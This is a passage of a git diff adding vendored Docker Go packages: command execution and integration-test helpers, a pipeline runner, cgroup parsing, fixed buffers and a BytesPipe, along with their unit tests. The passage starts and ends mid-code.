runs it, returning a result +func RunCommand(command string, args ...string) *Result { + return RunCmd(Cmd{Command: append([]string{command}, args...)}) +} + +// StartCmd starts a command, but doesn't wait for it to finish +func StartCmd(cmd Cmd) *Result { + result := buildCmd(cmd) + if result.Error != nil { + return result + } + result.SetExitError(result.Cmd.Start()) + return result +} + +func buildCmd(cmd Cmd) *Result { + var execCmd *exec.Cmd + switch len(cmd.Command) { + case 1: + execCmd = exec.Command(cmd.Command[0]) + default: + execCmd = exec.Command(cmd.Command[0], cmd.Command[1:]...) + } + outBuffer := new(lockedBuffer) + errBuffer := new(lockedBuffer) + + execCmd.Stdin = cmd.Stdin + execCmd.Dir = cmd.Dir + execCmd.Env = cmd.Env + if cmd.Stdout != nil { + execCmd.Stdout = io.MultiWriter(outBuffer, cmd.Stdout) + } else { + execCmd.Stdout = outBuffer + } + execCmd.Stderr = errBuffer + return &Result{ + Cmd: execCmd, + outBuffer: outBuffer, + errBuffer: errBuffer, + } +} + +// WaitOnCmd waits for a command to complete. If timeout is non-nil then +// only wait until the timeout. +func WaitOnCmd(timeout time.Duration, result *Result) *Result { + if timeout == time.Duration(0) { + result.SetExitError(result.Cmd.Wait()) + return result + } + + done := make(chan error, 1) + // Wait for command to exit in a goroutine + go func() { + done <- result.Cmd.Wait() + }() + + select { + case <-time.After(timeout): + killErr := result.Cmd.Process.Kill() + if killErr != nil { + fmt.Printf("failed to kill (pid=%d): %v\n", result.Cmd.Process.Pid, killErr) + } + result.Timeout = true + case err := <-done: + result.SetExitError(err) + } + return result +} diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go new file mode 100644 index 0000000000..df23442079 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go @@ -0,0 +1,118 @@ +package cmd + +import ( + "runtime" + "strings" + "testing" + "time" + + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestRunCommand(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + var cmd string + if runtime.GOOS == "solaris" { + cmd = "gls" + } else { + cmd = "ls" + } + result := RunCommand(cmd) + result.Assert(t, Expected{}) + + result = RunCommand("doesnotexists") + expectedError := `exec: "doesnotexists": executable file not found` + result.Assert(t, Expected{ExitCode: 127, Error: expectedError}) + + result = RunCommand(cmd, "-z") + result.Assert(t, Expected{ + ExitCode: 2, + Error: "exit status 2", + Err: "invalid option", + }) + assert.Contains(t, result.Combined(), "invalid option") +} + +func TestRunCommandWithCombined(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + result := RunCommand("ls", "-a") + result.Assert(t, Expected{}) + + assert.Contains(t, result.Combined(), "..") + assert.Contains(t, result.Stdout(), "..") +} + +func TestRunCommandWithTimeoutFinished(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + result := RunCmd(Cmd{ + Command: []string{"ls", "-a"}, + Timeout: 50 * time.Millisecond, + }) + result.Assert(t, Expected{Out: ".."}) +} + +func TestRunCommandWithTimeoutKilled(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + command := []string{"sh", "-c", "while true ; do echo 1 ; sleep .5 ; done"} + result := RunCmd(Cmd{Command: command, Timeout: 1250 * time.Millisecond}) + result.Assert(t, Expected{Timeout: true}) + + ones := strings.Split(result.Stdout(), "\n") + assert.Equal(t, len(ones), 4) +} + +func TestRunCommandWithErrors(t *testing.T) { + result := RunCommand("/foobar") + result.Assert(t, Expected{Error: "foobar", ExitCode: 127}) +} + +func TestRunCommandWithStdoutStderr(t *testing.T) { + result := RunCommand("echo", "hello", "world") + result.Assert(t, Expected{Out: "hello world\n", Err: None}) +} + +func TestRunCommandWithStdoutStderrError(t *testing.T) { + result := RunCommand("doesnotexists") + + expected := `exec: "doesnotexists": executable file not found` + result.Assert(t, Expected{Out: None, Err: None, ExitCode: 127, Error: expected}) + + switch runtime.GOOS { + case "windows": + expected = "ls: unknown option" + case "solaris": + expected = "gls: invalid option" + default: + expected = "ls: invalid option" + } + + var cmd string + if runtime.GOOS == "solaris" { + cmd = "gls" + } else { + cmd = "ls" + } + result = RunCommand(cmd, "-z") + result.Assert(t, Expected{ + Out: None, + Err: expected, + ExitCode: 2, + Error: "exit status 2", + }) +} diff --git a/vendor/github.com/docker/docker/pkg/integration/utils.go b/vendor/github.com/docker/docker/pkg/integration/utils.go new file mode 100644 index 0000000000..f2089c43c4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/integration/utils.go @@ -0,0 +1,227 @@ +package integration + +import ( + "archive/tar" + "errors" + "fmt" + "io" + "os" + "os/exec" + "path/filepath" + "reflect" + "strings" + "syscall" + "time" + + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/pkg/system" +) + +// IsKilled process the specified error and returns whether the process was killed or not. +func IsKilled(err error) bool { + if exitErr, ok := err.(*exec.ExitError); ok { + status, ok := exitErr.Sys().(syscall.WaitStatus) + if !ok { + return false + } + // status.ExitStatus() is required on Windows because it does not + // implement Signal() nor Signaled(). Just check it had a bad exit + // status could mean it was killed (and in tests we do kill) + return (status.Signaled() && status.Signal() == os.Kill) || status.ExitStatus() != 0 + } + return false +} + +func runCommandWithOutput(cmd *exec.Cmd) (output string, exitCode int, err error) { + exitCode = 0 + out, err := cmd.CombinedOutput() + exitCode = system.ProcessExitCode(err) + output = string(out) + return +} + +// RunCommandPipelineWithOutput runs the array of commands with the output +// of each pipelined with the following (like cmd1 | cmd2 | cmd3 would do). +// It returns the final output, the exitCode different from 0 and the error +// if something bad happened. +func RunCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) { + if len(cmds) < 2 { + return "", 0, errors.New("pipeline does not have multiple cmds") + } + + // connect stdin of each cmd to stdout pipe of previous cmd + for i, cmd := range cmds { + if i > 0 { + prevCmd := cmds[i-1] + cmd.Stdin, err = prevCmd.StdoutPipe() + + if err != nil { + return "", 0, fmt.Errorf("cannot set stdout pipe for %s: %v", cmd.Path, err) + } + } + } + + // start all cmds except the last + for _, cmd := range cmds[:len(cmds)-1] { + if err = cmd.Start(); err != nil { + return "", 0, fmt.Errorf("starting %s failed with error: %v", cmd.Path, err) + } + } + + defer func() { + var pipeErrMsgs []string + // wait all cmds except the last to release their resources + for _, cmd := range cmds[:len(cmds)-1] { + if pipeErr := cmd.Wait(); pipeErr != nil { + pipeErrMsgs = append(pipeErrMsgs, fmt.Sprintf("command %s failed with error: %v", cmd.Path, pipeErr)) + } + } + if len(pipeErrMsgs) > 0 && err == nil { + err = fmt.Errorf("pipelineError from Wait: %v", strings.Join(pipeErrMsgs, ", ")) + } + }() + + // wait on last cmd + return runCommandWithOutput(cmds[len(cmds)-1]) +} + +// ConvertSliceOfStringsToMap converts a slices of string in a map +// with the strings as key and an empty string as values. +func ConvertSliceOfStringsToMap(input []string) map[string]struct{} { + output := make(map[string]struct{}) + for _, v := range input { + output[v] = struct{}{} + } + return output +} + +// CompareDirectoryEntries compares two sets of FileInfo (usually taken from a directory) +// and returns an error if different. +func CompareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error { + var ( + e1Entries = make(map[string]struct{}) + e2Entries = make(map[string]struct{}) + ) + for _, e := range e1 { + e1Entries[e.Name()] = struct{}{} + } + for _, e := range e2 { + e2Entries[e.Name()] = struct{}{} + } + if !reflect.DeepEqual(e1Entries, e2Entries) { + return fmt.Errorf("entries differ") + } + return nil +} + +// ListTar lists the entries of a tar. +func ListTar(f io.Reader) ([]string, error) { + tr := tar.NewReader(f) + var entries []string + + for { + th, err := tr.Next() + if err == io.EOF { + // end of tar archive + return entries, nil + } + if err != nil { + return entries, err + } + entries = append(entries, th.Name) + } +} + +// RandomTmpDirPath provides a temporary path with rand string appended. +// does not create or checks if it exists. +func RandomTmpDirPath(s string, platform string) string { + tmp := "/tmp" + if platform == "windows" { + tmp = os.Getenv("TEMP") + } + path := filepath.Join(tmp, fmt.Sprintf("%s.%s", s, stringutils.GenerateRandomAlphaOnlyString(10))) + if platform == "windows" { + return filepath.FromSlash(path) // Using \ + } + return filepath.ToSlash(path) // Using / +} + +// ConsumeWithSpeed reads chunkSize bytes from reader before sleeping +// for interval duration. Returns total read bytes. Send true to the +// stop channel to return before reading to EOF on the reader. +func ConsumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) { + buffer := make([]byte, chunkSize) + for { + var readBytes int + readBytes, err = reader.Read(buffer) + n += readBytes + if err != nil { + if err == io.EOF { + err = nil + } + return + } + select { + case <-stop: + return + case <-time.After(interval): + } + } +} + +// ParseCgroupPaths parses 'procCgroupData', which is output of '/proc//cgroup', and returns +// a map which cgroup name as key and path as value. +func ParseCgroupPaths(procCgroupData string) map[string]string { + cgroupPaths := map[string]string{} + for _, line := range strings.Split(procCgroupData, "\n") { + parts := strings.Split(line, ":") + if len(parts) != 3 { + continue + } + cgroupPaths[parts[1]] = parts[2] + } + return cgroupPaths +} + +// ChannelBuffer holds a chan of byte array that can be populate in a goroutine. +type ChannelBuffer struct { + C chan []byte +} + +// Write implements Writer. +func (c *ChannelBuffer) Write(b []byte) (int, error) { + c.C <- b + return len(b), nil +} + +// Close closes the go channel. +func (c *ChannelBuffer) Close() error { + close(c.C) + return nil +} + +// ReadTimeout reads the content of the channel in the specified byte array with +// the specified duration as timeout. +func (c *ChannelBuffer) ReadTimeout(p []byte, n time.Duration) (int, error) { + select { + case b := <-c.C: + return copy(p[0:], b), nil + case <-time.After(n): + return -1, fmt.Errorf("timeout reading from channel") + } +} + +// RunAtDifferentDate runs the specified function with the given time. +// It changes the date of the system, which can led to weird behaviors. +func RunAtDifferentDate(date time.Time, block func()) { + // Layout for date. MMDDhhmmYYYY + const timeLayout = "010203042006" + // Ensure we bring time back to now + now := time.Now().Format(timeLayout) + defer icmd.RunCommand("date", now) + + icmd.RunCommand("date", date.Format(timeLayout)) + block() + return +} diff --git a/vendor/github.com/docker/docker/pkg/integration/utils_test.go b/vendor/github.com/docker/docker/pkg/integration/utils_test.go new file mode 100644 index 0000000000..0b2ef4aff5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/integration/utils_test.go @@ -0,0 +1,363 @@ +package integration + +import ( + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + "testing" + "time" +) + +func TestIsKilledFalseWithNonKilledProcess(t *testing.T) { + var lsCmd *exec.Cmd + if runtime.GOOS != "windows" { + lsCmd = exec.Command("ls") + } else { + lsCmd = exec.Command("cmd", "/c", "dir") + } + + err := lsCmd.Run() + if IsKilled(err) { + t.Fatalf("Expected the ls command to not be killed, was.") + } +} + +func TestIsKilledTrueWithKilledProcess(t *testing.T) { + var longCmd *exec.Cmd + if runtime.GOOS != "windows" { + longCmd = exec.Command("top") + } else { + longCmd = exec.Command("powershell", "while ($true) { sleep 1 }") + } + + // Start a command + err := longCmd.Start() + if err != nil { + t.Fatal(err) + } + // Capture the error when *dying* + done := make(chan error, 1) + go func() { + done <- longCmd.Wait() + }() + // Then kill it + longCmd.Process.Kill() + // Get the error + err = <-done + if !IsKilled(err) { + t.Fatalf("Expected the command to be killed, was not.") + } +} + +func TestRunCommandPipelineWithOutputWithNotEnoughCmds(t *testing.T) { + _, _, err := RunCommandPipelineWithOutput(exec.Command("ls")) + expectedError := "pipeline does not have multiple cmds" + if err == nil || err.Error() != expectedError { + t.Fatalf("Expected an error with %s, got err:%s", expectedError, err) + } +} + +func TestRunCommandPipelineWithOutputErrors(t *testing.T) { + p := "$PATH" + if runtime.GOOS == "windows" { + p = "%PATH%" + } + cmd1 := exec.Command("ls") + cmd1.Stdout = os.Stdout + cmd2 := exec.Command("anything really") + _, _, err := RunCommandPipelineWithOutput(cmd1, cmd2) + if err == nil || err.Error() != "cannot set stdout pipe for anything really: exec: Stdout already set" { + t.Fatalf("Expected an error, got %v", err) + } + + cmdWithError := exec.Command("doesnotexists") + cmdCat := exec.Command("cat") + _, _, err = RunCommandPipelineWithOutput(cmdWithError, cmdCat) + if err == nil || err.Error() != `starting doesnotexists failed with error: exec: "doesnotexists": executable file not found in `+p { + t.Fatalf("Expected an error, got %v", err) + } +} + +func TestRunCommandPipelineWithOutput(t *testing.T) { + //TODO: Should run on Solaris + if runtime.GOOS == "solaris" { + t.Skip() + } + cmds := []*exec.Cmd{ + // Print 2 characters + exec.Command("echo", "-n", "11"), + // Count the number or char from stdin (previous command) + exec.Command("wc", "-m"), + } + out, exitCode, err := RunCommandPipelineWithOutput(cmds...) + expectedOutput := "2\n" + if out != expectedOutput || exitCode != 0 || err != nil { + t.Fatalf("Expected %s for commands %v, got out:%s, exitCode:%d, err:%v", expectedOutput, cmds, out, exitCode, err) + } +} + +func TestConvertSliceOfStringsToMap(t *testing.T) { + input := []string{"a", "b"} + actual := ConvertSliceOfStringsToMap(input) + for _, key := range input { + if _, ok := actual[key]; !ok { + t.Fatalf("Expected output to contains key %s, did not: %v", key, actual) + } + } +} + +func TestCompareDirectoryEntries(t *testing.T) { + tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-compare-directories") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpFolder) + + file1 := filepath.Join(tmpFolder, "file1") + file2 := filepath.Join(tmpFolder, "file2") + os.Create(file1) + os.Create(file2) + + fi1, err := os.Stat(file1) + if err != nil { + t.Fatal(err) + } + fi1bis, err := os.Stat(file1) + if err != nil { + t.Fatal(err) + } + fi2, err := os.Stat(file2) + if err != nil { + t.Fatal(err) + } + + cases := []struct { + e1 []os.FileInfo + e2 []os.FileInfo + shouldError bool + }{ + // Empty directories + { + []os.FileInfo{}, + []os.FileInfo{}, + false, + }, + // Same FileInfos + { + []os.FileInfo{fi1}, + []os.FileInfo{fi1}, + false, + }, + // Different FileInfos but same names + { + []os.FileInfo{fi1}, + []os.FileInfo{fi1bis}, + false, + }, + // Different FileInfos, different names + { + []os.FileInfo{fi1}, + []os.FileInfo{fi2}, + true, + }, + } + for _, elt := range cases { + err := CompareDirectoryEntries(elt.e1, elt.e2) + if elt.shouldError && err == nil { + t.Fatalf("Should have return an error, did not with %v and %v", elt.e1, elt.e2) + } + if !elt.shouldError && err != nil { + t.Fatalf("Should have not returned an error, but did : %v with %v and %v", err, elt.e1, elt.e2) + } + } +} + +// FIXME make an "unhappy path" test for ListTar without "panicking" :-) +func TestListTar(t *testing.T) { + // TODO Windows: Figure out why this fails. Should be portable. + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows - needs further investigation") + } + tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-list-tar") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpFolder) + + // Let's create a Tar file + srcFile := filepath.Join(tmpFolder, "src") + tarFile := filepath.Join(tmpFolder, "src.tar") + os.Create(srcFile) + cmd := exec.Command("sh", "-c", "tar cf "+tarFile+" "+srcFile) + _, err = cmd.CombinedOutput() + if err != nil { + t.Fatal(err) + } + + reader, err := os.Open(tarFile) + if err != nil { + t.Fatal(err) + } + defer reader.Close() + + entries, err := ListTar(reader) + if err != nil { + t.Fatal(err) + } + if len(entries) != 1 && entries[0] != "src" { + t.Fatalf("Expected a tar file with 1 entry (%s), got %v", srcFile, entries) + } +} + +func TestRandomTmpDirPath(t *testing.T) { + path := RandomTmpDirPath("something", runtime.GOOS) + + prefix := "/tmp/something" + if runtime.GOOS == "windows" { + prefix = os.Getenv("TEMP") + `\something` + } + expectedSize := len(prefix) + 11 + + if !strings.HasPrefix(path, prefix) { + t.Fatalf("Expected generated path to have '%s' as prefix, got %s'", prefix, path) + } + if len(path) != expectedSize { + t.Fatalf("Expected generated path to be %d, got %d", expectedSize, len(path)) + } +} + +func TestConsumeWithSpeed(t *testing.T) { + reader := strings.NewReader("1234567890") + chunksize := 2 + + bytes1, err := ConsumeWithSpeed(reader, chunksize, 1*time.Second, nil) + if err != nil { + t.Fatal(err) + } + + if bytes1 != 10 { + t.Fatalf("Expected to have read 10 bytes, got %d", bytes1) + } + +} + +func TestConsumeWithSpeedWithStop(t *testing.T) { + reader := strings.NewReader("1234567890") + chunksize := 2 + + stopIt := make(chan bool) + + go func() { + time.Sleep(1 * time.Millisecond) + stopIt <- true + }() + + bytes1, err := ConsumeWithSpeed(reader, chunksize, 20*time.Millisecond, stopIt) + if err != nil { + t.Fatal(err) + } + + if bytes1 != 2 { + t.Fatalf("Expected to have read 2 bytes, got %d", bytes1) + } + +} + +func TestParseCgroupPathsEmpty(t *testing.T) { + cgroupMap := ParseCgroupPaths("") + if len(cgroupMap) != 0 { + t.Fatalf("Expected an empty map, got %v", cgroupMap) + } + cgroupMap = ParseCgroupPaths("\n") + if len(cgroupMap) != 0 { + t.Fatalf("Expected an empty map, got %v", cgroupMap) + } + cgroupMap = ParseCgroupPaths("something:else\nagain:here") + if len(cgroupMap) != 0 { + t.Fatalf("Expected an empty map, got %v", cgroupMap) + } +} + +func TestParseCgroupPaths(t *testing.T) { + cgroupMap := ParseCgroupPaths("2:memory:/a\n1:cpuset:/b") + if len(cgroupMap) != 2 { + t.Fatalf("Expected a map with 2 entries, got %v", cgroupMap) + } + if value, ok := cgroupMap["memory"]; !ok || value != "/a" { + t.Fatalf("Expected cgroupMap to contains an entry for 'memory' with value '/a', got %v", cgroupMap) + } + if value, ok := cgroupMap["cpuset"]; !ok || value != "/b" { + t.Fatalf("Expected cgroupMap to contains an entry for 'cpuset' with value '/b', got %v", cgroupMap) + } +} + +func TestChannelBufferTimeout(t *testing.T) { + expected := "11" + + buf := &ChannelBuffer{make(chan []byte, 1)} + defer buf.Close() + + done := make(chan struct{}, 1) + go func() { + time.Sleep(100 * time.Millisecond) + io.Copy(buf, strings.NewReader(expected)) + done <- struct{}{} + }() + + // Wait long enough + b := make([]byte, 2) + _, err := buf.ReadTimeout(b, 50*time.Millisecond) + if err == nil && err.Error() != "timeout reading from channel" { + t.Fatalf("Expected an error, got %s", err) + } + <-done +} + +func TestChannelBuffer(t *testing.T) { + expected := "11" + + buf := &ChannelBuffer{make(chan []byte, 1)} + defer buf.Close() + + go func() { + time.Sleep(100 * time.Millisecond) + io.Copy(buf, strings.NewReader(expected)) + }() + + // Wait long enough + b := make([]byte, 2) + _, err := buf.ReadTimeout(b, 200*time.Millisecond) + if err != nil { + t.Fatal(err) + } + + if string(b) != expected { + t.Fatalf("Expected '%s', got '%s'", expected, string(b)) + } +} + +// FIXME doesn't work +// func TestRunAtDifferentDate(t *testing.T) { +// var date string + +// // Layout for date. MMDDhhmmYYYY +// const timeLayout = "20060102" +// expectedDate := "20100201" +// theDate, err := time.Parse(timeLayout, expectedDate) +// if err != nil { +// t.Fatal(err) +// } + +// RunAtDifferentDate(theDate, func() { +// cmd := exec.Command("date", "+%Y%M%d") +// out, err := cmd.Output() +// if err != nil { +// t.Fatal(err) +// } +// date = string(out) +// }) +// } diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go new file mode 100644 index 0000000000..3d737b3e19 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go @@ -0,0 +1,51 @@ +package ioutils + +import ( + "errors" + "io" +) + +var errBufferFull = errors.New("buffer is full") + +type fixedBuffer struct { + buf []byte + pos int + lastRead int +} + +func (b *fixedBuffer) Write(p []byte) (int, error) { + n := copy(b.buf[b.pos:cap(b.buf)], p) + b.pos += n + + if n < len(p) { + if b.pos == cap(b.buf) { + return n, errBufferFull + } + return n, io.ErrShortWrite + } + return n, nil +} + +func (b *fixedBuffer) Read(p []byte) (int, error) { + n := copy(p, b.buf[b.lastRead:b.pos]) + b.lastRead += n + return n, nil +} + +func (b *fixedBuffer) Len() int { + return b.pos - b.lastRead +} + +func (b *fixedBuffer) Cap() int { + return cap(b.buf) +} + +func (b *fixedBuffer) Reset() { + b.pos = 0 + b.lastRead = 0 + b.buf = b.buf[:0] +} + +func (b *fixedBuffer) String() string { + return string(b.buf[b.lastRead:b.pos]) +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go new file mode 100644 index 0000000000..41098fa6e7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go @@ -0,0 +1,75 @@ +package ioutils + +import ( + "bytes" + "testing" +) + +func TestFixedBufferWrite(t *testing.T) { + buf := &fixedBuffer{buf: make([]byte, 0, 64)} + n, err := buf.Write([]byte("hello")) + if err != nil { + t.Fatal(err) + } + + if n != 5 { + t.Fatalf("expected 5 bytes written, got %d", n) + } + + if string(buf.buf[:5]) != "hello" { + t.Fatalf("expected \"hello\", got %q", string(buf.buf[:5])) + } + + n, err = buf.Write(bytes.Repeat([]byte{1}, 64)) + if err != errBufferFull { + t.Fatalf("expected errBufferFull, got %v - %v", err, buf.buf[:64]) + } +} + +func TestFixedBufferRead(t *testing.T) { + buf := &fixedBuffer{buf: make([]byte, 0, 64)} + if _, err := buf.Write([]byte("hello world")); err != nil { + t.Fatal(err) + } + + b := make([]byte, 5) + n, err := buf.Read(b) + if err != nil { + t.Fatal(err) + } + + if n != 5 { + t.Fatalf("expected 5 bytes read, got %d - %s", n, buf.String()) + } + + if string(b) != "hello" { + t.Fatalf("expected \"hello\", got %q", string(b)) + } + + n, err = buf.Read(b) + if err != nil { + t.Fatal(err) + } + + if n != 5 { + t.Fatalf("expected 5 bytes read, got %d", n) + } + + if string(b) != " worl" { + t.Fatalf("expected \" worl\", got %s", string(b)) + } + + b = b[:1] + n, err = buf.Read(b) + if err != nil { + t.Fatal(err) + } + + if n != 1 { + t.Fatalf("expected 1 byte read, got %d - %s", n, buf.String()) + } + + if string(b) != "d" { + t.Fatalf("expected \"d\", got %s", string(b)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go new file mode 100644 index 0000000000..72a04f3491 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go @@ -0,0 +1,186 @@ +package ioutils + +import ( + "errors" + "io" + "sync" +) + +// maxCap is the highest capacity to use in byte slices that buffer data. +const maxCap = 1e6 + +// minCap is the lowest capacity to use in byte slices that buffer data +const minCap = 64 + +// blockThreshold is the minimum number of bytes in the buffer which will cause +// a write to BytesPipe to block when allocating a new slice. +const blockThreshold = 1e6 + +var ( + // ErrClosed is returned when Write is called on a closed BytesPipe. + ErrClosed = errors.New("write to closed BytesPipe") + + bufPools = make(map[int]*sync.Pool) + bufPoolsLock sync.Mutex +) + +// BytesPipe is io.ReadWriteCloser which works similarly to pipe(queue). +// All written data may be read at most once. Also, BytesPipe allocates +// and releases new byte slices to adjust to current needs, so the buffer +// won't be overgrown after peak loads. +type BytesPipe struct { + mu sync.Mutex + wait *sync.Cond + buf []*fixedBuffer + bufLen int + closeErr error // error to return from next Read. set to nil if not closed. +} + +// NewBytesPipe creates new BytesPipe, initialized by specified slice. +// If buf is nil, then it will be initialized with slice which cap is 64. +// buf will be adjusted in a way that len(buf) == 0, cap(buf) == cap(buf). +func NewBytesPipe() *BytesPipe { + bp := &BytesPipe{} + bp.buf = append(bp.buf, getBuffer(minCap)) + bp.wait = sync.NewCond(&bp.mu) + return bp +} + +// Write writes p to BytesPipe. +// It can allocate new []byte slices in a process of writing. +func (bp *BytesPipe) Write(p []byte) (int, error) { + bp.mu.Lock() + + written := 0 +loop0: + for { + if bp.closeErr != nil { + bp.mu.Unlock() + return written, ErrClosed + } + + if len(bp.buf) == 0 { + bp.buf = append(bp.buf, getBuffer(64)) + } + // get the last buffer + b := bp.buf[len(bp.buf)-1] + + n, err := b.Write(p) + written += n + bp.bufLen += n + + // errBufferFull is an error we expect to get if the buffer is full + if err != nil && err != errBufferFull { + bp.wait.Broadcast() + bp.mu.Unlock() + return written, err + } + + // if there was enough room to write all then break + if len(p) == n { + break + } + + // more data: write to the next slice + p = p[n:] + + // make sure the buffer doesn't grow too big from this write + for bp.bufLen >= blockThreshold { + bp.wait.Wait() + if bp.closeErr != nil { + continue loop0 + } + } + + // add new byte slice to the buffers slice and continue writing + nextCap := b.Cap() * 2 + if nextCap > maxCap { + nextCap = maxCap + } + bp.buf = append(bp.buf, getBuffer(nextCap)) + } + bp.wait.Broadcast() + bp.mu.Unlock() + return written, nil +} + +// CloseWithError causes further reads from a BytesPipe to return immediately. +func (bp *BytesPipe) CloseWithError(err error) error { + bp.mu.Lock() + if err != nil { + bp.closeErr = err + } else { + bp.closeErr = io.EOF + } + bp.wait.Broadcast() + bp.mu.Unlock() + return nil +} + +// Close causes further reads from a BytesPipe to return immediately. +func (bp *BytesPipe) Close() error { + return bp.CloseWithError(nil) +} + +// Read reads bytes from BytesPipe. +// Data could be read only once. +func (bp *BytesPipe) Read(p []byte) (n int, err error) { + bp.mu.Lock() + if bp.bufLen == 0 { + if bp.closeErr != nil { + bp.mu.Unlock() + return 0, bp.closeErr + } + bp.wait.Wait() + if bp.bufLen == 0 && bp.closeErr != nil { + err := bp.closeErr + bp.mu.Unlock() + return 0, err + } + } + + for bp.bufLen > 0 { + b := bp.buf[0] + read, _ := b.Read(p) // ignore error since fixedBuffer doesn't really return an error + n += read + bp.bufLen -= read + + if b.Len() == 0 { + // it's empty so return it to the pool and move to the next one + returnBuffer(b) + bp.buf[0] = nil + bp.buf = bp.buf[1:] + } + + if len(p) == read { + break + } + + p = p[read:] + } + + bp.wait.Broadcast() + bp.mu.Unlock() + return +} + +func returnBuffer(b *fixedBuffer) { + b.Reset() + bufPoolsLock.Lock() + pool := bufPools[b.Cap()] + bufPoolsLock.Unlock() + if pool != nil { + pool.Put(b) + } +} + +func getBuffer(size int) *fixedBuffer { + bufPoolsLock.Lock() + pool, ok := bufPools[size] + if !ok { + pool = &sync.Pool{New: func() interface{} { return &fixedBuffer{buf: make([]byte, 0, size)} }} + bufPools[size] = pool + } + bufPoolsLock.Unlock() + return pool.Get().(*fixedBuffer) +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go new file mode 100644 index 0000000000..300fb5f6d5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go @@ -0,0 +1,159 @@ +package ioutils + +import ( + "crypto/sha1" + "encoding/hex" + "math/rand" + "testing" + "time" +) + +func TestBytesPipeRead(t *testing.T) { + buf := NewBytesPipe() + buf.Write([]byte("12")) + buf.Write([]byte("34")) + buf.Write([]byte("56")) + buf.Write([]byte("78")) + buf.Write([]byte("90")) + rd := make([]byte, 4) + n, err := buf.Read(rd) + if err != nil { + t.Fatal(err) + } + if n != 4 { + t.Fatalf("Wrong number of bytes read: %d, should be %d", n, 4) + } + if string(rd) != "1234" { + t.Fatalf("Read %s, but must be %s", rd, "1234") + } + n, err = buf.Read(rd) + if err != nil { + t.Fatal(err) + } + if n != 4 { + t.Fatalf("Wrong number of bytes read: %d, should be %d", n, 4) + } + if string(rd) != "5678" { + t.Fatalf("Read %s, but must be %s", rd, "5679") + } + n, err = buf.Read(rd) + if err != nil { + t.Fatal(err) + } + if n != 2 { + t.Fatalf("Wrong number of bytes read: %d, should be %d", n, 2) + } + if string(rd[:n]) != "90" { + t.Fatalf("Read %s, but must be %s", rd, "90") + } +} + +func TestBytesPipeWrite(t *testing.T) { + buf := NewBytesPipe() + buf.Write([]byte("12")) + buf.Write([]byte("34")) + buf.Write([]byte("56")) + buf.Write([]byte("78")) + buf.Write([]byte("90")) + if buf.buf[0].String() != "1234567890" { + t.Fatalf("Buffer %q, must be %q", buf.buf[0].String(), "1234567890") + } +} + +// Write and read in different speeds/chunk sizes and check valid data is read. +func TestBytesPipeWriteRandomChunks(t *testing.T) { + cases := []struct{ iterations, writesPerLoop, readsPerLoop int }{ + {100, 10, 1}, + {1000, 10, 5}, + {1000, 100, 0}, + {1000, 5, 6}, + {10000, 50, 25}, + } + + testMessage := []byte("this is a random string for testing") + // random slice sizes to read and write + writeChunks := []int{25, 35, 15, 20} + readChunks := []int{5, 45, 20, 25} + + for _, c := range cases { + // first pass: write directly to hash + hash := sha1.New() + for i := 0; i < c.iterations*c.writesPerLoop; i++ { + if _, err := hash.Write(testMessage[:writeChunks[i%len(writeChunks)]]); err != nil { + t.Fatal(err) + } + } + expected := hex.EncodeToString(hash.Sum(nil)) + + // write/read through buffer + buf := NewBytesPipe() + hash.Reset() + + done := make(chan struct{}) + + go func() { + // random delay before read starts + <-time.After(time.Duration(rand.Intn(10)) * time.Millisecond) + for i := 0; ; i++ { + p := make([]byte, readChunks[(c.iterations*c.readsPerLoop+i)%len(readChunks)]) + n, _ := buf.Read(p) + if n == 0 { + break + } + hash.Write(p[:n]) + } + + close(done) + }() + + for i := 0; i < c.iterations; i++ { + for w := 0; w < c.writesPerLoop; w++ { + buf.Write(testMessage[:writeChunks[(i*c.writesPerLoop+w)%len(writeChunks)]]) + } + } + buf.Close() + <-done + + actual := hex.EncodeToString(hash.Sum(nil)) + + if expected != actual { + t.Fatalf("BytesPipe returned invalid data. Expected checksum %v, got %v", expected, actual) + } + + } +} + +func BenchmarkBytesPipeWrite(b *testing.B) { + testData := []byte("pretty short line, because why not?") + for i := 0; i < b.N; i++ { + readBuf := make([]byte, 1024) + buf := NewBytesPipe() + go func() { + var err error + for err == nil { + _, err = buf.Read(readBuf) + } + }() + for j := 0; j < 1000; j++ { + buf.Write(testData) + } + buf.Close() + } +} + +func 